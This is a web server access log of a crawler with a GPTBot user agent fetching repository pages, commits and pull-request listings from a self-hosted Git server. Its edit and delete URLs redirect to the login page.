-[17/Feb/2026:17:19:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:19:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:19:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:19:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:19:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:19:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 46760] [Gzip 22.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:17:19:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:17:19:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 22369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:17:19:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:17:19:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10094] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build" -[17/Feb/2026:17:19:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build" -[17/Feb/2026:17:19:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build" -[17/Feb/2026:17:19:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 9861] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old" -[17/Feb/2026:17:19:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 11196] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:19:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:17:19:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:17:19:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/main.cpp?display=source" [Client 74.7.227.38] [Length 11422] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:19:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/main.cpp?display=source" [Client 74.7.227.38] [Length 11421] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:19:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/main.cpp?display=source" [Client 74.7.227.38] [Length 11422] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:19:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10970] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:19:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:19:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:19:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:19:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10971] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:19:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10969] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:19:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:17:19:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:17:19:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=all&type=all" -[17/Feb/2026:17:19:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=all&type=all" -[17/Feb/2026:17:19:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp2.md?display=rendered" [Client 74.7.227.38] [Length 23940] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp2.md" -[17/Feb/2026:17:19:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp2.md?display=rendered" [Client 74.7.227.38] [Length 23940] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp2.md" -[17/Feb/2026:17:19:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:17:19:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:19:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10064] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:19:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp.md?display=rendered" [Client 74.7.227.38] [Length 176814] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp.md" -[17/Feb/2026:17:19:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-cpp2.md?display=rendered" [Client 74.7.227.38] [Length 23943] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-cpp2.md" -[17/Feb/2026:17:19:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:17:19:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/main?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/main" -[17/Feb/2026:17:19:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/main?display=rendered" [Client 74.7.227.38] [Length 10906] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/main" -[17/Feb/2026:17:19:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9981] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&state=all&type=all" -[17/Feb/2026:17:19:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&state=all&type=all" -[17/Feb/2026:17:19:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=nearduedate&state=all&type=all" -[17/Feb/2026:17:19:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11569] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/README.md" -[17/Feb/2026:17:19:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json?display=source" [Client 74.7.227.38] [Length 13174] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" -[17/Feb/2026:17:19:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:19:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/libintl-8.dll" [Client 74.7.227.38] [Length 11055] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog" -[17/Feb/2026:17:19:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=all&type=all" -[17/Feb/2026:17:19:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=all&type=all" -[17/Feb/2026:17:20:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&state=all&type=all" -[17/Feb/2026:17:20:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache?display=rendered" [Client 74.7.227.38] [Length 10970] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" -[17/Feb/2026:17:20:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html?display=rendered" [Client 74.7.227.38] [Length 14583] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html" -[17/Feb/2026:17:20:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/index.html" [Client 74.7.227.38] [Length 56835] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/index.html" -[17/Feb/2026:17:20:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/html/index.html" [Client 74.7.227.38] [Length 66090] [Gzip 13.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/index.html" -[17/Feb/2026:17:20:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor" [Client 74.7.227.38] [Length 224346] [Gzip 12.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" -[17/Feb/2026:17:20:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot" [Client 74.7.227.38] [Length 174792] [Gzip 16.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot" -[17/Feb/2026:17:20:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/README.md?display=rendered" [Client 74.7.227.38] [Length 10904] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/README.md" -[17/Feb/2026:17:20:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresWatchdog/libintl-8.dll" [Client 74.7.227.38] [Length 299024] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libintl-8.dll" -[17/Feb/2026:17:20:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresWatchdog/libintl-8.dll" [Client 74.7.227.38] [Length 38] [Gzip -] 